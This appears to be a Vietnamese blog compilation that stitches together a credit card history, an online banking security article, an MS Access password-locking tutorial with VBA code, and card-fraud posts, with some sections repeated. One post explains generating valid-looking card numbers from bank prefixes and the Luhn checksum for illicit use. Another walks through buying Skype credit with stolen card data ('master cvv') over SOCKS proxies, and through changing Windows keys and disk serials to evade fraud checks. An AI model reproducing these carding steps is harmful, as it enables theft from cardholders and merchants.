Chiếc thẻ Thần Kỳ " Revolving Credit Card " lần đầu tiên cấp cho người xử dụng tại tiểu bang California do Bank of America phát hành nên gọi là BankAmericard và nhanh chóng phổ biển rộng rãi khắp tiểu bang . Cái thẻ thần kỳ này đã bắt đầu một bước tiến quan trong cho kỹ nghệ credit card . Thẻ BankAmericard đã cho người xử dụng 1 sự lựa chọn trong việc thanh toán tiền bạc . Họ có thể trả hết 1 lần hoặc trả góp từng tháng ( minimum payment) số tiền thiếu còn lại , ngân hàng sẽ bắt đầu tính tiền lời . Phương pháp này đưọc tiếp dùng cho đến ngày nay .Thẻ này còn thêm một ưu điểm mà ai cũng thích là nếu kẹt tiền , người xử dụng ( cardholder) có thể ra ngân hàng mượn tiền mà không cần phải điền những thủ tục mượn tiền phiền toái ( nhanh, gọn, lẹ ).
Vì sự tiện lợi của thẻ này và nhu cầu đòi hỏi của khách hàng, Bank Card Association được thành hình , vào năm 1965 Bank of America đã cấp giấy phép ( Licensing ) cho những ngân hàng lớn , nhỏ khắp Hoa Kỳ , cho phép những ngân hàng này cấp thẻ BankAmericard cho khách hàng xử dụng ( đương nhiên phải trả tiền cho Bank of America ). Tới năm 1969 hầu hết các thẻ tín dụng do những ngân hàng độc lập cấp đều chuyển qua loại thẻ BankAmericard hoặc MasterCharge Card . Cho nên có thể nói Bank of America là vị tổ khai sinh ra cái thẻ thần kỳ này và lợi tức mang lại từ những chiếc thẻ này đã góp phần không nhỏ đưa Bank of America từ một ngân hàng địa phương ( local bank) thành 1 trong những ngân hàng lớn nhất thế giới .
Thẻ tín dụng cấp phát ngày càng nhiều, công việc xử lý hoá đơn cho từng trương mục ( account)nhiều đến nổi các hệ thống ngân hàng không đảm đương nổi và từ đó dẫn đến sự ra đời của các hội thể tín dụng ( Credit card associations ) như Interlink Association, Western State Bank Card Association, và National BankAmericard Ịnc,. Trong khoảng thời gian này các hoa đơn chưa được điện tử hoá , vẫn còn dùng các loại hoá đơn bằng giấy ( 1 người khách mua hàng hay cash tiền , người thâu ngân phải gọi điện thoại để xin thanh toán hoá đơn (approve charge)sau khi ngân hàng cấp thẻ ( Issue Bank ) đồng ý trả tiền thì sẽ cho người nhận (merchant) 1 số ( authorization number )rồi người nhận lấy 1 hoá đơn ( gồm 3 copy)đặt credit card và hoá đơn này lên một cái máy ( Imprinter) cà qua cà lại ( slide)vài lần để những con số trên thẻ in xuống hoá đơn, sau đó điền số bằng lái, số phone và chữ ký của người chủ thẻ ( cardholder) . 1 bản giao cho người khách, 1 bản deposit vào ngân hàng và 1 bản người nhận giữ .Người Việt chúng ta thường nói đùa mỗi khi trả tiền bằng thẻ là Cà thẻ ( Chi tiết sẽ nói trong bài " Hóws the banking system work ). Chỉ một transaction thôi đã mất nhiều thì giờ mhư vậy, các bạn thử nghĩ mỗi ngày ngân hàng xử lý cả trăm triệu transaction thì mất bao nhiêu thời gian . Đây cũng là dịp để những người " cho tôi ăn ké với" có cơ hội kiếm ăn Credit card fraud ( sẽ nói riêng về phần này )
Như đã nói ở trên, mãi tới năm 1970 sự ra đời của máy điện toán ( IBM computer nó to như cái xe bò)thì kỹ nghệ credit card mới rẻ qua 1 con đường thêng thang rộng mở . Cho phép người nhận thẻ ( retail establishment or merchant) nhận trả bằng thẻ 24 giờ/ 1 ngày và cũng giảm một số lượng giấy tờ đáng kể .
Khoảng giữa thập niên 70 kỹ nghệ credit card mon men tìm kiếm khách hàng trên thị trường quốc tế, nhưng gặp vài trở ngại vì chữ America cho nên BankAmericard đổi thành Visa và Master Charge vì trong 1 vụ kiện đã đổi thành Master Card
Khoảng năm 1979 nhờ sự tiến bộ trong ngành điện tử và điện toán cá nhân ( electronic & PC personal computer ) kỹ nghệ credit card lại tiến thêm 1 bước quan trọng nữa . Sự tiến bộ này đã cho phép người nhận thẻ " chà " swipe thẻ của khách hàng qua máy ( dialup terminal) và mọi thủ tục được điện tử hoá ( electronic processing ) nên đã tiết kiệm được rất nhiều thì giờ và tiền bạc đồng thời cũng nảy sinh ra kỹ nghệ tái chế giấy cũ ( paper recycle )vài người Việt cũng làm giàu nhờ kỹ nghệ tái chế này ( recycling industry )
Bảo mật với Online Banking
TTO - Bắt đầu sử dụng từ những năm 1990, thanh toán trực tuyến (Online Banking) là cốt lõi đối với thương mại điện tử. Tuy vậy việc quản trị và bảo mật tài khoản vẫn không thể ngăn được những thất thoát đáng tiếc, nhất là trong tình trạng tội phạm tài chính Internet đang ngày một nở rộ như hiện nay.
An ninh tài chính mạng vẫn luôn là một thách thức đối với bất kỳ ngân hàng nào.
Có thể ngồi tại Việt Nam, đặt mua một món quà cho người thân đang ở Pháp. Hóa đơn điện nước, điện thoại có thể tự động định kỳ thanh toán. Bạn đặt mua một chiếc đồng hồ Thụy Sĩ trên Internet và chiếc đồng được đem đến tận nhà bạn tại Anh. Hơn 53 triệu người Mỹ đã và đang làm quen dần với hình thức này.
Một hệ thống Online Banking thường bao gồm luôn cả chức năng ngân hàng dành cho người dùng. Khách hàng có thể truy xuất tài khoản để biết thông tin, thực hiện các tác vụ mua bán và chuyển nhượng tài chính. Đơn giản, chỉ cần truy xuất vào tài khoản thông qua Internet, vừa nhanh chóng vừa tiện lợi và chính xác.
Một nghiên cứu kéo dài 18 tháng của Bank of American cũng cho thấy, khách hàng sử dụng dịch vụ trực tuyến có xu thế “trung thành” hơn. Hơn nữa, Online Banking hiện là một dịch vụ miễn phí. Sự tiện dụng, kinh tế chính là ưu điểm của loại hình thanh toán này.
Biểu đồ so sánh tình hình sử dụng các giải pháp an ninh ngân hàng trực tuyến tại châu Âu
Thực trạng an ninh
Những báo cáo gần đây về tình trạng vi phạm, phá rào và lừa gạt để lấy thông tin trong lĩnh vực tài chính làm cho khách hàng e ngại các hoạt động chuyển nhượng tài chính trực tuyến. Các hành động lừa đảo trên Internet dễ thực hiện, ít nguy hiểm và ít tốn kém hơn.
Từ những nghiên cứu mới nhất của Javelin và Pew Report cho thấy, phần lớn các lỗi không phải về phía ngân hàng mà về phía khách hàng. Chỉ tính riêng trong việc bị mất cắp thông tin tài khoản, thì các nguyên nhân ngoại tuyến chiếm 68%, bao gồm cả việc mất ví, sổ tay và thư tín dụng. Tỷ lệ lừa gạt trực tuyến chỉ chiếm có 11,6%.
5% người Mỹ là nạn nhân của các cuộc tấn công tài chính trên mạng, bao gồm cả cá nhân và doanh nghiệp với con số tổn thất khoảng 53 tỷ USD hàng năm.
Thế nhưng, khách hàng có điều kiện theo dõi thường xuyên tài khoản của mình cũng là một cách hay để hạn chế mất tiền. Vì tài khoản được theo dõi thường xuyên hơn, số lượng tiền nếu có bị thất thoát cũng rất ít. Khả năng phát hiện sớm những cuộc đánh cắp sẽ hạn chế số lượng tiền bị thất thoát.
Những khách hàng không sử dụng Online banking có xác suất mất thông tin tài khoản cao hơn vì họ để lại nhiều dấu vết vật lý như sổ tay, hóa đơn chứng từ, tạo điều kiện cho kẻ cắp biết được thông tin tài chính của mình.
Chứng thực đa cấp
Chế độ chứng thực đa cấp đang được xem xét để thay cho chế độ đơn cấp hiện nay, nhằm giải quyết một trong các vấn nạn an ninh tài chính. Ở chế độ đơn cấp, bạn chỉ cần có mật mã là đủ. Điều đó rất dễ dàng bị người khác ăn cắp mà ngay đến bạn cũng không hề biết.
Tuy nhiên, với chế độ đa cấp thì thường mật mã phải được kết hợp với một dạng thông tin "không thể bị đánh cắp", có thể là một câu hỏi mang tính cá nhân kết hợp với câu trả lời... Đây là cách thức được dùng bởi Bank of Americans, với chương trình SiteKey.
Một cách khác là dùng các hệ chìa khóa. Đó có thể là một thiết bị giải mã đặt tại máy tính cá nhân, có chìa khóa và chỉ hoạt động với số PIN của riêng mỗi người. Sẽ dễ dàng hơn cho chủ nhân để phát hiện ra chìa khóa bị mất thay vì một mớ ký tự trong đầu.
Sinh trắc học cũng đang là một trong những giải pháp được hướng đến kết hợp với trong chế độ chứng thực đa cấp. Đây được xem là một trong những giải pháp của tương lai. Hiện cũng có một số công ty đã bắt đầu sản xuất bàn phím sinh trắc học để dành cho các tác vụ chứng thực. Tuy nhiên, giá còn hơi cao.
Giải quyết về chế độ chứng thực chỉ là một trong những giải pháp nhằm tạo một môi trường an toàn hơn cho Online Banking. Không thể có một môi trường nào là tuyệt đối an toàn cả.
Căn bản về Credit Card
Một Number Card thường gồm có 16 chữ số, có loại có 13 chữ số.
Trong đó, 4 chữ số đầu tiên thường quy định và là dấu hiệu nhận dạng bởi các tên của ngân hàng phát hành Card đó
3xxx xxxx xxxx xxxx: Ameriacan Express Card
4xxx xxxx xxxx xxxx: Visa Card
5xxx xxxx xxxx xxxx: Master Card
6xxx xxxx xxxx xxxx: Discover Card
Chữ số đầu tiên thường được dùng để nhận biết đó là Card của loại nào.
3 = Ame
4 = Visa
5 = Master
6 = Discover
3 chữ số tiếp theo sau là tên nhận dạng ID của ngân hàng.
Nói chung, khi ta nhìn vào 4 ký tự số đầu tiên ta sẽ biết đó là thể loại nào: American Express Card, Visa Card, Master Card hay Discover Card.
AMERICAN EXPRESS
3XXX
3728
3713
3731 - AmEx Green
3737 - AmEx Optima
3782 - AmEx - Small Corporate Card
....
VISA CARD
4XXX
4013 - Citibank
4019 - Bank of America
4024 - Bank of America
4027 - Rockwell Federal Credit Union
4032 - Household Bank
....
MASTER CARD
5XXX
5100 - Western States Bankcard Association
5110 - Universal Travel Voucher
5120 - Western States Bankcard Association
5130 - Eurocard France
....
DISCOVER CARD
6XXX
6013 - MBNA
....
Làm sao để kiểm tra số Card là đúng. Nhờ đâu mà các chương trình kiểm tra Card có thể biết được đó là số đúng của Card.
Câu trả lời đó là tất cả đều phụ thuộc vào con số cuối cùng của Card. Đó là con số mà những chương trình gọi là số tổng kiểm tra (checksum), con số này sẽ quyết định dãy số của Card là số đúng hay sai.
Nếu con số cuối cùng là đúng và phù hợp thì nó là một dãy số Number Card đúng, chúng ta có thể dùng nó.
Nếu số đó là một con số sai thì coi như Number Card đó sai.
Tuy nhiên, nếu chúng ta thông minh và để ý một chút thì ta vẫn có thể tìm được một Number Card đúng sau 9 lần thử khác nhau. Vì ta có thể thay đổi con số cuối cùng thành 1 trong 9 lựa chọn khác:
Ví dụ: 3xxx xxxx xxxx xxx5 : dãy số đúng ta cần tìm.
Ta lần lượt thay con số cuối cùng như sau:
3xxx xxxx xxxx xxx0
3xxx xxxx xxxx xxx1
3xxx xxxx xxxx xxx2
3xxx xxxx xxxx xxx3
3xxx xxxx xxxx xxx4
3xxx xxxx xxxx xxx5 ===> đây là kết quả đúng và con số 5 là số cần tìm.
3xxx xxxx xxxx xxx6
3xxx xxxx xxxx xxx7
3xxx xxxx xxxx xxx8
3xxx xxxx xxxx xxx9
Như vậy tới đây là tạm thời có thể hiểu cách tìm (tính toán) sao cho có một Number Card đúng.
Đây là cách tính thủ công, cách tính “mẹo”. Quá dễ phảI không các bạn.
Như vậy các bạn chỉ cần biết 4 con số đầu tiên để làm “gốc”, 4 con số này để chương trình biết nó là Master Card hay Visa Card … và đó chính là tên của ngân hàng. Sau đó các bạn có thể tự bịa ra 1 dãy số bất kỳ nào đó.
Thay đổi con số “cuối cùng” trong khoảng từ 0..9 để tìm ra con số đúng nhất và như vậy bạn đã có 1 Number Card hợp lệ.
Cách tính toán và tìm ra quy luật của Number Card.
Như đã nói ở trên, chúng ta chỉ cần biết 4 con số đầu tiên mà thôi. Đó là 4 con số quy định tên ID của ngân hàng. Chúng ta chỉ cần biết 4 con số đó là có thể tự tạo ra cho mình một số lượng Number Card dùng thoải mái cho đến ngày vào Prison chơi
Sau đây tôi sẽ cùng các bạn đi tìm cách tính toán một cách khoa học và chính xác hơn chứ không phảI ngồi mò mò, rồi phảI thay đổi con số cuối cho phù hợp.
Ví dụ: 5204 xxxx xxxx xxxY
5204 = Security Pacific : đây là Master Card do ngân hàng Security Pacific phát hành.
xxxx xxxx xxx: là một dãy số ngẫu nhiên, bất kỳ nào đó.
Y : đây là con số cần tìm để Number Card là hợp lệ
Sau khi biết 4 số đầu tiên, ta có thể lấy ngẫu nhiên và bất kỳ từ số 0 đến số 9 của mười một ký tự số đại diện cho chữ X.
Giả sử tôi lấy là
5204 1234 5678 901Y
5204 xxxx xxxx xxxY
Trong đó ta chia ra làm 2 dãy số chẵn và dãy số lẽ.
a. Dãy số 5 0 1 3 5 7 9 1 ta gọi là dãy số lẽ.
b. Dãy số 2 4 2 4 6 8 0 Y ta gọi là dãy số chẫn.
Lấy từng chữ số trong dãy số lẽ “nhân” vớI 2
5 x 2 = 10
0 x 2 = 0
1 x 2 = 2
3 x 2 = 6
5 x 2 = 10
7 x 2 = 14
9 x 2 = 18
1 x 2 = 2
Nếu kết quả nhân của từng số nào lớn hơn 9, thì ta lấy số đó trừ đi 9.
5 x 2 = 10 - 9 = 1
0 x 2 = 0 = 0
1 x 2 = 2 = 2
3 x 2 = 6 = 6
5 x 2 = 10 = 1
7 x 2 = 14 - 9 = 5
9 x 2 = 18 - 9 = 9
1 x 2 = 2 = 2
Cộng các kết quả mớI tình được lai vớI nhau:
1 + 0 + 2 + 6 + 1 + 5 + 9 + 2 = 26 ===èSố A
Cộng các chữ số của dãy số chẵn lại vớI nhau, vì Y là số cần tìm và ta chưa biết nên không cần cộng
Dãy số 2 4 2 4 6 8 0 Y là dãy số chẵn đã nói ở trên
2 + 4 + 2 + 4 + 6 + 8 + 0 = 26 ===è Số B
Lấy A + B
26 + 26 = 52
TớI đây ta lấy số cuối cùng là 2 cộng thêm 8 để làm tròn số thành 10
Ví dụ:
+ số cuối cùng là 3 thì cộng thêm 7 để thành 10
+ số cuối cùng là 4 thì cộng thêm 6 để thành 10
+ số cuối cùng là 5 thì cộng thêm 5 để thành 10
+ số cuối cùng là 6 thì cộng thêm 4 để thành 10
+ số cuối cùng là 7 thì cộng thêm 3 để thành 10
+ số cuối cùng là 8 thì cộng thêm 2 để thành 10
+ số cuối cùng là 9 thì cộng thêm 1 để thành 10
+ số cuối cùng là 0 thì cộng thêm 0 để thành 0 =è chú ý chỗ này
+ số cuối cùng là 1 thì cộng thêm 9 để thành 10
Nói chung là cộng thêm số nào đó để nó thành số chẵn là 10
Vậy cái số bí mật cần tìm chính là con số được cộng thêm vào.
Trong ví dụ này, đó chính là con số 8.
Vậy số Y cần tìm là 8
Số Number Card là 5204 1234 5678 9018
Thứ Hai, 19 tháng 1, 2009
Lập trình bảo mật cơ sỡ dữ liệu access
1. Bảo vệ mã lệnh VBA (Visual Basic for Application) bằng cách chọn mục Properties trên trình đơn Tools của cửa sổ soạn thảo Microsoft Visual Basic rồi chọn trang Protection trên hộp thoại Project Properties. Cuối cùng, chọn Lock project for viewing, kèm theo là mật khẩu bảo vệ. Với cách này, cấu trúc và dữ liệu các bảng (table) vẫn có thể được xem và sửa đổi.
2. Dùng chức năng Make MDE file để ngăn không cho sửa đổi mã lệnh, thiết kế biểu mẫu (form) và thiết kế báo biểu (report). Với cách này, cấu trúc và dữ liệu các bảng (table) vẫn có thể được lấy đi để chuyển vào tập tin .MDB khác mà xem và sửa đổi.
3. Dùng chức năng Encrypt / Decrypt database… để mã hóa CSDL, ngăn không cho các chương trình tiện ích hay xử lý văn bản giải mã nhưng vẫn có thể dùng Access để mở.
4. Dùng chức năng Set database password để quy định mật khẩu cho CSDL. Cách này hơi phiền nếu có một bảng trong CSDL khác liên kết (link) với nó. Nếu quên mật khẩu thì … khóc luôn chứ sao!
5. Thiết kế một biểu mẫu khởi động, trong đó yêu cầu cho biết tên và mật khẩu, dùng hộp thoại Startup (từ danh sách Display Form/Page) để quy định phải mở biểu mẫu này trước tiên mỗi lần mở CSDL. Nhờ cách này, ta có thể giấu luôn cửa sổ Database, nơi có thể xem và chọn các thành phần của CSDL để sửa chữa.
Trong những cách trên, cách thứ 5 vẫn có thể bị vượt qua bằng cách nhấn và giữ phím Shift trong lúc mở CSDL. Để khắc phục, ta có thể dùng Visual Basic gán trị False cho thuộc tính AllowBypassKey để vô hiệu hóa phím Shift khi mở CSDL.
Giả sử bạn có một CSDL tên dbLock.MDB. Mỗi lần người ta mở nó, bạn muốn biểu mẫu frmKhoiDong luôn được hiển thị trước tiên bằng cách xác định Display Form/Page là frmKhoiDong. Để thay đổi thuộc tính AllowBypassKey, bắt buộc phải mở CSDL, gán trị mới cho thuộc tính này, đóng CSDL lại thì lần mở sau mới có ép-phê. Bạn nhớ, cần khóa làm sao để người ta không mở được mà mình mở được, nghĩa là ta phải có chìa khóa để mở. Chìa ở đây chính là một biểu mẫu khác, chẳng hạn có tên là frmChiaKhoa.
Khi đã thay đổi thuộc tính AllowBypassKey được rồi, chắc chắn biểu mẫu frmKhoiDong được hiển thị khi mở CSDL. Cho nên ta đặt chìa khóa thông qua biểu mẫu này bằng cách vẽ một ô điều khiển nào đấy (miễn sao nó có thủ tục xử lý tình huống Click là được), chẳng hạn nhãn lblChiaKhoa, rồi đặt thuộc tính Visible là No và thêm dòng lệnh DoCmd.OpenForm “frmChiaKhoa” vào thủ tục xử lý tình huống Click. Bạn phải nhớ vị trí nhãn lblChiaKhoa để lôi chìa khóa ra nhé. Như vậy, vấn đề còn lại nằm ở biểu mẫu frmChiaKhoa.
Bạn mở cửa sổ soạn thảo Microsoft Visual Basic, chọn mục References… để bảo đảm Microsoft DAO xx.xx Object Library (trong đó, phiên bản xx.xx có thể là: 2.5 hoặc 3.51 hoặc 3.6 tùy theo phiên bản Access, dĩ nhiên nên chọn phiên bản mới nhất) đã được chọn trong danh sách Available References.
Hình 1: Biểu mẫu cần thiết kế
Hình 1 là biểu mẫu frmChiaKhoa cần thiết kế, bao gồm một ô văn bản txtPassword để nhận mật khẩu mà người cần mở khóa phải gõ vào, một nút lệnh cmdLock thực hiện việc khóa CSDL và một nút lệnh cmdUnlock thực hiện việc mở khóa CSDL. Xong, bạn gõ các thủ tục xử lý như đoạn mã 1. Trước khi quậy chuyện này trên một CSDL, bạn nên sao chép phòng hờ CSDL để tránh sự cố khóa được rồi nhưng không mở được (do bạn gõ nhầm các dòng lệnh).
Đoạn mã 1
'Hàm ChangeProperty thay đổi các thuộc tính của CSDL
Function ChangeProperty(strPropName, varPropType, varPropValue)
Dim dbs As Database, prp As Property
Const conPropNotFoundError = 3270
Set dbs = CurrentDb
On Error GoTo Change_XuLyLoi
dbs.Properties(strPropName) = varPropValue
ChangeProperty = True
Change_KetThuc:
Exit Function
Change_XuLyLoi:
'Thuộc tính không thấy
If Err = conPropNotFoundError Then
Set prp = dbs.CreateProperty(strPropName, _
varPropType, varPropValue)
dbs.Properties.Append prp
Resume Next
Else
'Không biết lỗi gì
ChangeProperty = False
Resume Change_KetThuc
End If
End Function
'Xử lý tình huống chọn nút [Khóa database]
Private Sub cmdLock_Click()
‘Biểu mẫu này được nạp trước
ChangeProperty "StartupForm", dbText, "frmKhoiDong"
ChangeProperty "StartupShowDBWindow", dbBoolean, False
ChangeProperty "StartupShowStatusBar", dbBoolean, False
ChangeProperty "AllowBuiltinToolbars", dbBoolean, False
ChangeProperty "AllowFullMenus", dbBoolean, False
ChangeProperty "AllowBreakIntoCode", dbBoolean, False
ChangeProperty "AllowSpecialKeys", dbBoolean, False
‘Không cho xài phím Shift để bỏ qua biểu mẫu frmKhoiDong
ChangeProperty "AllowBypassKey", dbBoolean, False
MsgBox "Cơ sở dữ liệu đã được khóa! Đóng cơ sở dữ liệu, ê.", vbOKOnly, " Security"
cmdExit.SetFocus
cmdUnlock.Visible = True
cmdLock.Visible = False
End Sub
'Xử lý tình huống chọn nút [Mở database]
Private Sub cmdUnlock_Click()
‘Không cần biểu mẫu khởi động nữa
ChangeProperty "StartupForm", dbText, ""
ChangeProperty "StartupShowDBWindow", dbBoolean, True
ChangeProperty "StartupShowStatusBar", dbBoolean, True
ChangeProperty "AllowBuiltinToolbars", dbBoolean, True
ChangeProperty "AllowFullMenus", dbBoolean, True
ChangeProperty "AllowBreakIntoCode", dbBoolean, True
ChangeProperty "AllowSpecialKeys", dbBoolean, True
ChangeProperty "AllowBypassKey", dbBoolean, True
MsgBox "Cơ sở dữ liệu đã được mở khóa ! _
Đóng cơ sở dữ liệu,.", _
vbOKOnly, " Security"
cmdExit.SetFocus
txtPassword = ""
cmdLock.Visible = True
cmdUnlock.Visible = False
txtPassword.Visible = False
End Sub
'Xử lý tình huống khi mở biểu mẫu
Private Sub Form_Open(Cancel As Integer)
Dim dbs As Database
Set dbs = CurrentDb
On Error GoTo KhongCoThuocTinh_Err
If dbs.Properties("AllowBypassKey") Then
cmdLock.Visible = True
txtPassword.Visible = False
Else
cmdLock.Visible = False
txtPassword.Visible = True
End If
Exit Sub
KhongCoThuocTinh_Err:
cmdLock.Visible = True
txtPassword.Visible = False
End Sub
'Khi người ta gõ mật khẩu và nhấn phím Enter
Private Sub txtPassword_LostFocus()
If txtPassword = "echip" Then
cmdUnlock.Visible = True
End If
End Sub
2. Dùng chức năng Make MDE file để ngăn không cho sửa đổi mã lệnh, thiết kế biểu mẫu (form) và thiết kế báo biểu (report). Với cách này, cấu trúc và dữ liệu các bảng (table) vẫn có thể được lấy đi để chuyển vào tập tin .MDB khác mà xem và sửa đổi.
3. Dùng chức năng Encrypt / Decrypt database… để mã hóa CSDL, ngăn không cho các chương trình tiện ích hay xử lý văn bản giải mã nhưng vẫn có thể dùng Access để mở.
4. Dùng chức năng Set database password để quy định mật khẩu cho CSDL. Cách này hơi phiền nếu có một bảng trong CSDL khác liên kết (link) với nó. Nếu quên mật khẩu thì … khóc luôn chứ sao!
5. Thiết kế một biểu mẫu khởi động, trong đó yêu cầu cho biết tên và mật khẩu, dùng hộp thoại Startup (từ danh sách Display Form/Page) để quy định phải mở biểu mẫu này trước tiên mỗi lần mở CSDL. Nhờ cách này, ta có thể giấu luôn cửa sổ Database, nơi có thể xem và chọn các thành phần của CSDL để sửa chữa.
Trong những cách trên, cách thứ 5 vẫn có thể bị vượt qua bằng cách nhấn và giữ phím Shift trong lúc mở CSDL. Để khắc phục, ta có thể dùng Visual Basic gán trị False cho thuộc tính AllowBypassKey để vô hiệu hóa phím Shift khi mở CSDL.
Giả sử bạn có một CSDL tên dbLock.MDB. Mỗi lần người ta mở nó, bạn muốn biểu mẫu frmKhoiDong luôn được hiển thị trước tiên bằng cách xác định Display Form/Page là frmKhoiDong. Để thay đổi thuộc tính AllowBypassKey, bắt buộc phải mở CSDL, gán trị mới cho thuộc tính này, đóng CSDL lại thì lần mở sau mới có ép-phê. Bạn nhớ, cần khóa làm sao để người ta không mở được mà mình mở được, nghĩa là ta phải có chìa khóa để mở. Chìa ở đây chính là một biểu mẫu khác, chẳng hạn có tên là frmChiaKhoa.
Khi đã thay đổi thuộc tính AllowBypassKey được rồi, chắc chắn biểu mẫu frmKhoiDong được hiển thị khi mở CSDL. Cho nên ta đặt chìa khóa thông qua biểu mẫu này bằng cách vẽ một ô điều khiển nào đấy (miễn sao nó có thủ tục xử lý tình huống Click là được), chẳng hạn nhãn lblChiaKhoa, rồi đặt thuộc tính Visible là No và thêm dòng lệnh DoCmd.OpenForm “frmChiaKhoa” vào thủ tục xử lý tình huống Click. Bạn phải nhớ vị trí nhãn lblChiaKhoa để lôi chìa khóa ra nhé. Như vậy, vấn đề còn lại nằm ở biểu mẫu frmChiaKhoa.
Bạn mở cửa sổ soạn thảo Microsoft Visual Basic, chọn mục References… để bảo đảm Microsoft DAO xx.xx Object Library (trong đó, phiên bản xx.xx có thể là: 2.5 hoặc 3.51 hoặc 3.6 tùy theo phiên bản Access, dĩ nhiên nên chọn phiên bản mới nhất) đã được chọn trong danh sách Available References.
Hình 1: Biểu mẫu cần thiết kế
Hình 1 là biểu mẫu frmChiaKhoa cần thiết kế, bao gồm một ô văn bản txtPassword để nhận mật khẩu mà người cần mở khóa phải gõ vào, một nút lệnh cmdLock thực hiện việc khóa CSDL và một nút lệnh cmdUnlock thực hiện việc mở khóa CSDL. Xong, bạn gõ các thủ tục xử lý như đoạn mã 1. Trước khi quậy chuyện này trên một CSDL, bạn nên sao chép phòng hờ CSDL để tránh sự cố khóa được rồi nhưng không mở được (do bạn gõ nhầm các dòng lệnh).
Đoạn mã 1
'Hàm ChangeProperty thay đổi các thuộc tính của CSDL
Function ChangeProperty(strPropName, varPropType, varPropValue)
Dim dbs As Database, prp As Property
Const conPropNotFoundError = 3270
Set dbs = CurrentDb
On Error GoTo Change_XuLyLoi
dbs.Properties(strPropName) = varPropValue
ChangeProperty = True
Change_KetThuc:
Exit Function
Change_XuLyLoi:
'Thuộc tính không thấy
If Err = conPropNotFoundError Then
Set prp = dbs.CreateProperty(strPropName, _
varPropType, varPropValue)
dbs.Properties.Append prp
Resume Next
Else
'Không biết lỗi gì
ChangeProperty = False
Resume Change_KetThuc
End If
End Function
'Xử lý tình huống chọn nút [Khóa database]
Private Sub cmdLock_Click()
‘Biểu mẫu này được nạp trước
ChangeProperty "StartupForm", dbText, "frmKhoiDong"
ChangeProperty "StartupShowDBWindow", dbBoolean, False
ChangeProperty "StartupShowStatusBar", dbBoolean, False
ChangeProperty "AllowBuiltinToolbars", dbBoolean, False
ChangeProperty "AllowFullMenus", dbBoolean, False
ChangeProperty "AllowBreakIntoCode", dbBoolean, False
ChangeProperty "AllowSpecialKeys", dbBoolean, False
‘Không cho xài phím Shift để bỏ qua biểu mẫu frmKhoiDong
ChangeProperty "AllowBypassKey", dbBoolean, False
MsgBox "Cơ sở dữ liệu đã được khóa! Đóng cơ sở dữ liệu, ê.", vbOKOnly, " Security"
cmdExit.SetFocus
cmdUnlock.Visible = True
cmdLock.Visible = False
End Sub
'Xử lý tình huống chọn nút [Mở database]
Private Sub cmdUnlock_Click()
‘Không cần biểu mẫu khởi động nữa
ChangeProperty "StartupForm", dbText, ""
ChangeProperty "StartupShowDBWindow", dbBoolean, True
ChangeProperty "StartupShowStatusBar", dbBoolean, True
ChangeProperty "AllowBuiltinToolbars", dbBoolean, True
ChangeProperty "AllowFullMenus", dbBoolean, True
ChangeProperty "AllowBreakIntoCode", dbBoolean, True
ChangeProperty "AllowSpecialKeys", dbBoolean, True
ChangeProperty "AllowBypassKey", dbBoolean, True
MsgBox "Cơ sở dữ liệu đã được mở khóa ! _
Đóng cơ sở dữ liệu,.", _
vbOKOnly, " Security"
cmdExit.SetFocus
txtPassword = ""
cmdLock.Visible = True
cmdUnlock.Visible = False
txtPassword.Visible = False
End Sub
'Xử lý tình huống khi mở biểu mẫu
Private Sub Form_Open(Cancel As Integer)
Dim dbs As Database
Set dbs = CurrentDb
On Error GoTo KhongCoThuocTinh_Err
If dbs.Properties("AllowBypassKey") Then
cmdLock.Visible = True
txtPassword.Visible = False
Else
cmdLock.Visible = False
txtPassword.Visible = True
End If
Exit Sub
KhongCoThuocTinh_Err:
cmdLock.Visible = True
txtPassword.Visible = False
End Sub
'Khi người ta gõ mật khẩu và nhấn phím Enter
Private Sub txtPassword_LostFocus()
If txtPassword = "echip" Then
cmdUnlock.Visible = True
End If
End Sub
Tut reg skype phone
Vì thấy nhu cầu 1 số bạn cần gọi điện mà lại biết reg skype nên tớ viết bài này hướng dẫn cho cách reg thế nào cho qua skype!
1. Chọn 1 em sock us, speed nhanh 1 tí! download + cài đặt trên sock luôn (BL của sock ko quan trọng).
2. Creat account xong vào phoneout của nó, mua hẳn trên chương trình gọi điện luôn, dùng 1 con master cvv để mua.
3. Phần info chủ thẻ ko quan trọng quan trọng là phần payment của nó, có nghĩa là lần đầu pay ko được thì lần sau ko cần đổi info chủ thẻ, cứ vào thẳng payment mà bem. Nên để auto-charge, nghĩa là khi < 2$ nó sẽ tự động nộp thêm 10$ cho mình tiếp.
Nếu nó hiện ra thankyou. Ok tiền đã vào tài khoản và xài con sock đó gọi luôn và sock die thì phải thay sock khác gọi, gọi bang ip vn la block luôn! Có cách gọi skype ko cần fake nhưng reg phức tạp hơn 1 tí. Tớ sẽ làm 1 tut sau.
Còn nếu nó bi failed. Lý do có thể là do cc đó đã reg skype rồi mà trong thời gian gần đây. Hoặc do computer của bạn đã bị record. Có 2 loại record của skype, thứ nhất là record key window, cái này do mình reg và pay nhiều lần trong thời gian ngắn, cái này thì chỉ cần change key window là ok. Còn cái record thứ 2 là nó record series của HDD ổ mà bạn cài skype. Dù có reg thành công nhưng khi gọi bi blocked ngay! Mình sẽ share luôn tool đổi series ổ cứng cho các bạn luôn!
link tool change key window: http://rilwis.info/softs/keywin+changekey.rar
link tool change series HDD : http://rilwis.info/softs/Volumeserial_src.rar
1. Chọn 1 em sock us, speed nhanh 1 tí! download + cài đặt trên sock luôn (BL của sock ko quan trọng).
2. Creat account xong vào phoneout của nó, mua hẳn trên chương trình gọi điện luôn, dùng 1 con master cvv để mua.
3. Phần info chủ thẻ ko quan trọng quan trọng là phần payment của nó, có nghĩa là lần đầu pay ko được thì lần sau ko cần đổi info chủ thẻ, cứ vào thẳng payment mà bem. Nên để auto-charge, nghĩa là khi < 2$ nó sẽ tự động nộp thêm 10$ cho mình tiếp.
Nếu nó hiện ra thankyou. Ok tiền đã vào tài khoản và xài con sock đó gọi luôn và sock die thì phải thay sock khác gọi, gọi bang ip vn la block luôn! Có cách gọi skype ko cần fake nhưng reg phức tạp hơn 1 tí. Tớ sẽ làm 1 tut sau.
Còn nếu nó bi failed. Lý do có thể là do cc đó đã reg skype rồi mà trong thời gian gần đây. Hoặc do computer của bạn đã bị record. Có 2 loại record của skype, thứ nhất là record key window, cái này do mình reg và pay nhiều lần trong thời gian ngắn, cái này thì chỉ cần change key window là ok. Còn cái record thứ 2 là nó record series của HDD ổ mà bạn cài skype. Dù có reg thành công nhưng khi gọi bi blocked ngay! Mình sẽ share luôn tool đổi series ổ cứng cho các bạn luôn!
link tool change key window: http://rilwis.info/softs/keywin+changekey.rar
